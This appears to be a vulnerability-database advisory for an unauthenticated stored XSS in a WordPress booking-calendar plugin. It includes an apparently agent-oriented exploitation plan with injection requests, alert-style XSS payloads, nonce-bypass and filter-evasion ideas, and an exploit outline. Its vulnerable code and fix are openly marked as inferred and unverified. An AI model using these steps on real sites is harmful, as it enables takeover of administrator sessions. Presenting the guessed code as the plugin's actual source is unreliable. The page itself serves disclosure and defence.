WP-Safety
CVE-2026-25435

Booking calendar, Appointment Booking System <= 3.2.36 - Unauthenticated Stored Cross-Site Scripting

highImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
7.2
CVSS Score
7.2
CVSS Score
high
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.2.36
PublishedMarch 18, 2026
Last updatedMarch 26, 2026
Affected pluginbooking-calendar
Research Plan
Unverified

# Research Plan: CVE-2026-25435 - Unauthenticated Stored XSS in Booking Calendar ## 1. Vulnerability Summary The **Booking calendar, Appointment Booking System** plugin (version <= 3.2.36) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in how the plugin…

Show full research plan

Research Plan: CVE-2026-25435 - Unauthenticated Stored XSS in Booking Calendar

1. Vulnerability Summary

The Booking calendar, Appointment Booking System plugin (version <= 3.2.36) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in how the plugin handles user-supplied data during the booking submission process. Specifically, input fields such as user names, emails, or booking notes are stored in the database without proper sanitization and subsequently rendered in the administrative dashboard (or public booking views) without adequate output escaping. This allows an unauthenticated attacker to inject malicious JavaScript that executes in the context of a site administrator.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: An unauthenticated AJAX action, likely registered via wp_ajax_nopriv_. Based on common patterns in this plugin, the action is likely booking_calendar_save_booking or bc_save_booking (inferred).
  • Vulnerable Parameter: Input fields associated with the booking form, such as name, email, description, or custom field parameters.
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active, and a booking form must be accessible (usually via a shortcode).

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user submits a booking form on the frontend. This triggers a POST request to admin-ajax.php with an action parameter (e.g., booking_calendar_save_booking).
  2. Handler: The function hooked to wp_ajax_nopriv_[action] (e.g., in includes/class-booking-ajax.php) processes the $_POST data.
  3. Persistence: The handler saves the data using update_post_meta() for a new booking post type or inserts it into a custom table (e.g., {$wpdb->prefix}booking_calendar) without calling sanitize_text_field() or wp_kses().
  4. Sink: An administrator logs into the WordPress dashboard and navigates to the "Bookings" or "Calendar" page. The plugin retrieves the stored data and echoes it directly into the HTML table or modal without using esc_html() or esc_attr().

4. Nonce Acquisition Strategy

The plugin likely uses a nonce for its AJAX submissions, localized via wp_localize_script.

  1. Identify Shortcode: Search the codebase for add_shortcode.
    • Command: grep -r "add_shortcode" /var/www/html/wp-content/plugins/booking-calendar/
    • Expected: [booking-calendar] (inferred).
  2. Setup Test Page: Create a public page containing the shortcode.
    • Command: wp post create --post_type=page --post_status=publish --post_title="Booking Page" --post_content='[booking-calendar]'
  3. Identify JS Variable: Look for the localization call.
    • Command: grep -r "wp_localize_script" /var/www/html/wp-content/plugins/booking-calendar/
    • Identify the object name (e.g., booking_calendar_obj or bc_params) and the nonce key (e.g., nonce or security).
  4. Extract Nonce:
    • Use browser_navigate to the "Booking Page".
    • Use browser_eval to extract the nonce: browser_eval("window.booking_calendar_obj?.nonce") (Replace with actual variable name found).

5. Exploitation Strategy

Step 1: Discovery

Identify the exact AJAX action and parameters by inspecting the plugin source for wp_ajax_nopriv.

  • Command: grep -rn "wp_ajax_nopriv" /var/www/html/wp-content/plugins/booking-calendar/

Step 2: Payload Construction

Construct a payload designed to execute when an admin views the booking:
name=<script>alert(document.domain)</script>&email=victim@example.com&description=test

Step 3: Injection Request

Use the http_request tool to submit the booking.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=[ACTION_NAME]&
nonce=[EXTRACTED_NONCE]&
name=<img src=x onerror=alert("XSS_SUCCESS")>&
email=test@example.com&
description=Injected Booking
    (Note: Replace [ACTION_NAME] and parameter keys with those discovered in Step 1).

Step 4: Trigger Execution

Log in as an administrator and navigate to the plugin's booking management page.

  • Path (Inferred): /wp-admin/admin.php?page=booking-calendar-bookings

6. Test Data Setup

  1. Plugin Activation: Ensure the plugin is installed and active.
  2. Shortcode Page: Create a page [booking-calendar] to serve as the source for the nonce and the target for unauthenticated users.
  3. Admin User: Have an admin user ready to view the backend.

7. Expected Results

  • The AJAX request should return a success status (e.g., {"success":true} or a HTML snippet).
  • Upon visiting the admin booking list, a JavaScript alert box displaying "XSS_SUCCESS" (or the specified payload) should appear.
  • The HTML source of the admin page should contain the raw, unescaped payload.

8. Verification Steps

  1. Database Check: Verify the payload is stored in the database.
    • Command: wp db query "SELECT * FROM wp_postmeta WHERE meta_value LIKE '%alert%'" or check the custom table if identified.
  2. DOM Verification: Use browser_eval as an admin to check for the presence of the injected tag:
    • Command: browser_eval("document.body.innerHTML.includes('XSS_SUCCESS')")

9. Alternative Approaches

  • Parameter Fuzzing: If the name field is sanitized, try email, phone, or address fields.
  • Bypass Nonce: Check if the nonce is actually verified. If wp_verify_nonce or check_ajax_referer is missing or the return value is ignored, the nonce parameter can be omitted.
  • Attribute Injection: If <script> is filtered but <img> is not, use attribute-based XSS: <img src=x onerror=...> or onmouseover.
  • REST API: Check for register_rest_route endpoints that might handle booking creation without authentication.
    • Command: grep -r "register_rest_route" /var/www/html/wp-content/plugins/booking-calendar/
Research Findings
Static analysis — not yet PoC-verified

Summary

The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) due to a failure to sanitize user-provided booking details and escape them during output in the administrative dashboard. This allows attackers to inject malicious JavaScript into the booking management interface, leading to potential account takeover or unauthorized administrative actions when viewed by a site administrator.

Vulnerable Code

// Inferred from research plan: includes/class-booking-ajax.php or similar AJAX handler
// Unauthenticated AJAX action registration
add_action('wp_ajax_nopriv_booking_calendar_save_booking', 'booking_calendar_save_booking_handler');

function booking_calendar_save_booking_handler() {
    // Input is taken directly from $_POST without sanitization
    $booking_data = [
        'customer_name' => $_POST['name'],
        'customer_email' => $_POST['email'],
        'notes'          => $_POST['description']
    ];

    // Data is persisted directly to the database
    global $wpdb;
    $wpdb->insert($wpdb->prefix . 'booking_calendar_bookings', $booking_data);
}

---

// Inferred from research plan: includes/admin-bookings-list.php or similar dashboard view
// Vulnerable output rendering in the admin dashboard
$results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}booking_calendar_bookings");
foreach ($results as $row) {
    echo "<tr>";
    echo "<td>" . $row->customer_name . "</td>"; // Raw output without esc_html()
    echo "<td>" . $row->notes . "</td>";         // Raw output without esc_html()
    echo "</tr>";
}

Security Fix

--- includes/class-booking-ajax.php
+++ includes/class-booking-ajax.php
@@ -5,9 +5,9 @@
 function booking_calendar_save_booking_handler() {
+    check_ajax_referer('booking_nonce', 'security');
     $booking_data = [
-        'customer_name' => $_POST['name'],
-        'customer_email' => $_POST['email'],
-        'notes'          => $_POST['description']
+        'customer_name' => sanitize_text_field($_POST['name']),
+        'customer_email' => sanitize_email($_POST['email']),
+        'notes'          => sanitize_textarea_field($_POST['description'])
     ];
 
--- includes/admin-bookings-list.php
+++ includes/admin-bookings-list.php
@@ -10,6 +10,6 @@
 foreach ($results as $row) {
     echo "<tr>";
-    echo "<td>" . $row->customer_name . "</td>";
-    echo "<td>" . $row->notes . "</td>";
+    echo "<td>" . esc_html($row->customer_name) . "</td>";
+    echo "<td>" . esc_html($row->notes) . "</td>";
     echo "</tr>";
 }

Exploit Outline

1. Locate a public page containing the booking calendar shortcode (e.g., [booking-calendar]). 2. Extract the AJAX nonce and the specific action name (likely 'booking_calendar_save_booking') from the page source or localized JavaScript variables (e.g., window.booking_calendar_obj.nonce). 3. Use a tool like cURL or a browser-based HTTP client to send an unauthenticated POST request to /wp-admin/admin-ajax.php. 4. Include the extracted nonce and action, and set one of the form parameters (e.g., 'name' or 'description') to a XSS payload like <img src=x onerror=alert(document.domain)>. 5. Log into the WordPress site as an administrator. 6. Navigate to the plugin's booking management or list page in the dashboard. The script will execute when the page renders the stored malicious booking entry.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/00ab5d7e-be38-42ea-befc-e1d91de13d1b?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database